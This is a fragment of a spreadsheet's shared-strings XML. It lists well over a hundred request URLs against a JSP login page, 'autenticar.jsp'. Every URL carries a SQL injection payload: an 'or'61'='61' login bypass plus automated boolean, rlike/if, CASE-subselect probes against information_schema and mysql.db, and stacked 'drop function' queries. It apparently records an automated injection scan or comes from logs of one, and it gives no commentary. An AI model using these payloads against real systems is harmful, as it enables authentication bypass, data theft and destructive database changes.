  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1406'ornot(9479=6426)#and'adkz'like'adkz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1946&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5396")ornot(7943=4336)#and("cblg"="cblg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1585")ornot(4823=4823)#and("hswe"="hswe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-317")ornot(2612=906)#and("ipmj"="ipmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3140&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9056"))ornot(2089=586)#and(("vfuw"="vfuw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4821"))ornot(4823=4823)#and(("mugm"="mugm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5173"))ornot(4561=6519)#and(("iypa"="iypa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3659&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3207")))ornot(4802=7706)#and((("evan"="evan&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9884")))ornot(4823=4823)#and((("rcyk"="rcyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6028")))ornot(4074=2274)#and((("dcjn"="dcjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5832&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5897"ornot(2621=2691)#and"eqru"="eqru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1156"ornot(4823=4823)#and"cnup"="cnup&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5600"ornot(7211=4576)#and"pzil"="pzil&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4636&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3289")ornot(3034=9988)#and("axdp"like"axdp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4384")ornot(4823=4823)#and("luzg"like"luzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4603")ornot(2841=3376)#and("vvyr"like"vvyr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7864&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3187"))ornot(8686=8321)#and(("sgtz"like"sgtz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2241"))ornot(4823=4823)#and(("srpz"like"srpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8825"))ornot(8525=3871)#and(("vaqc"like"vaqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9158&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6252")))ornot(8126=2394)#and((("cxvj"like"cxvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8271")))ornot(4823=4823)#and((("ncuq"like"ncuq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2083")))ornot(9805=5185)#and((("vjap"like"vjap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7986&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7680"ornot(4068=9016)#and"ldml"like"ldml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7680"ornot(4823=4823)#and"vcgv"like"vcgv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1303"ornot(1524=9485)#and"hmak"like"hmak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(1275=1275,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(2903=2903,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(913=913,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(8969=8969,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(2903=2903,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(5826=5826,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(6685=6685,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(2903=2903,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(9672=9672,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(265=265,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(2903=2903,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(7694=7694,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(4607=4607,,0x28)and(542=542&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(2903=2903,,0x28)and(5528=5528&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)rlikeif(8466=8466,,0x28)and(9296=9296&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))rlikeif(9272=9272,,0x28)and((7191=7191&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))rlikeif(2903=2903,,0x28)and((3490=3490&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))rlikeif(9722=9722,,0x28)and((7313=7313&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))rlikeif(57=57,,0x28)and(((6547=6547&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))rlikeif(2903=2903,,0x28)and(((6958=6958&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))rlikeif(4129=4129,,0x28)and(((1374=1374&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=rlikeif(1199=1199,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=rlikeif(2903=2903,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=rlikeif(9075=9075,,0x28)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(4318=4318,,0x28)and('mzxg'='mzxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(2903=2903,,0x28)and('hbkc'='hbkc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(9423=9423,,0x28)and('wyre'='wyre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(6236=6236,,0x28)and(('gysp'='gysp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(2903=2903,,0x28)and(('kqvd'='kqvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(19=19,,0x28)and(('jfgs'='jfgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(8650=8650,,0x28)and((('dtxi'='dtxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(2903=2903,,0x28)and((('lnms'='lnms&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(5279=5279,,0x28)and((('nxdv'='nxdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(2426=2426,,0x28)and'dhky'='dhky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(2903=2903,,0x28)and'deek'='deek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(6360=6360,,0x28)and'xejw'='xejw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(4146=4146,,0x28)and('pkml'like'pkml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(2903=2903,,0x28)and('lrfs'like'lrfs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')rlikeif(8760=8760,,0x28)and('mixu'like'mixu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(3884=3884,,0x28)and(('kzbd'like'kzbd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(2903=2903,,0x28)and(('teph'like'teph&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))rlikeif(8386=8386,,0x28)and(('eomk'like'eomk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(3586=3586,,0x28)and((('dvet'like'dvet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(2903=2903,,0x28)and((('bjod'like'bjod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))rlikeif(5193=5193,,0x28)and((('ftgl'like'ftgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(3933=3933,,0x28)and'tnrb'like'tnrb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(2903=2903,,0x28)and'mxor'like'mxor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='rlikeif(1067=1067,,0x28)and'jzxi'like'jzxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(955=955,,0x28)and("tcgb"="tcgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(2903=2903,,0x28)and("qeck"="qeck&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(5795=5795,,0x28)and("wubd"="wubd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(3929=3929,,0x28)and(("vfnv"="vfnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(2903=2903,,0x28)and(("mjue"="mjue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(5140=5140,,0x28)and(("rdhu"="rdhu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(8149=8149,,0x28)and((("hnps"="hnps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(2903=2903,,0x28)and((("kaoz"="kaoz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(8474=8474,,0x28)and((("cmup"="cmup&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(8132=8132,,0x28)and"itil"="itil&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(2903=2903,,0x28)and"btam"="btam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(9284=9284,,0x28)and"mnzp"="mnzp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(3598=3598,,0x28)and("iwfd"like"iwfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(2903=2903,,0x28)and("smjt"like"smjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")rlikeif(3807=3807,,0x28)and("efpd"like"efpd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(5890=5890,,0x28)and(("omyu"like"omyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(2903=2903,,0x28)and(("nwoa"like"nwoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))rlikeif(5990=5990,,0x28)and(("yxvu"like"yxvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(6563=6563,,0x28)and((("snax"like"snax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(2903=2903,,0x28)and((("rscs"like"rscs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))rlikeif(6986=6986,,0x28)and((("tarv"like"tarv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(2019=2019,,0x28)and"yzqz"like"yzqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(2903=2903,,0x28)and"ongt"like"ongt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="rlikeif(6760=6760,,0x28)and"bitz"like"bitz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=make_set(2689=9674,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=make_set(8072=8072,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=make_set(8069=3034,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=elt(5773=2540,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=elt(3085=3085,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=elt(7016=5109,)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(4171=5713)*&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(720=720)*&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(5291=1037)*&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(3939=2671)thenelse3939*(select3939frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(5701=5701)thenelse5701*(select5701frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(2208=2676)thenelse2208*(select2208frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(4096=1844)thenelse4096*(select4096frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(5687=5687)thenelse5687*(select5687frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select(casewhen(3158=2248)thenelse3158*(select3158frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(3140=9301)thenelse3140*(select3140frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(6937=6937)thenelse6937*(select6937frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(3305=2254)thenelse3305*(select3305frominformation_schema.character_sets)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(1165=9625)thenelse1165*(select1165frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(4233=4233)thenelse4233*(select4233frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select(casewhen(6350=1082)thenelse6350*(select6350frommysql.db)end))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((8198=8823),select8198,dropfunctionglon);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((6251=6251),select6251,dropfunctionkfik);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((8918=1772),select8918,dropfunctionxlbo);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((9966=1247),select9966,dropfunctionhkkj);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((6251=6251),select6251,dropfunctionkfik);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((5397=1528),select5397,dropfunctionldgc);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((1854=3813),select1854,dropfunctiontyqx);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((6251=6251),select6251,dropfunctionkfik);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((7960=9934),select7960,dropfunctionmveg);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((2318=1387),select2318,dropfunctionrpvl);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((6251=6251),select6251,dropfunctionkfik);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((3688=6556),select3688,dropfunctionaqja);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((2337=9363),select2337,dropfunctiontppv);--and(912=912&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((6251=6251),select6251,dropfunctionkfik);--and(9977=9977&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if((8562=4293),select8562,dropfunctionkgfi);--and(9001=9001&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if((1900=5029),select1900,dropfunctionbxqf);--and((9309=9309&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if((6251=6251),select6251,dropfunctionkfik);--and((8353=8353&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if((6811=3674),select6811,dropfunctionthdq);--and((3017=3017&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if((2203=6576),select2203,dropfunctionqsav);--and(((3563=3563&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if((6251=6251),select6251,dropfunctionkfik);--and(((3304=3304&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if((2481=3929),select2481,dropfunctionkomd);--and(((778=778&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if((9777=3469),select9777,dropfunctionicvu);--&amp;modo=entrar</t>
  </si>
  <si>
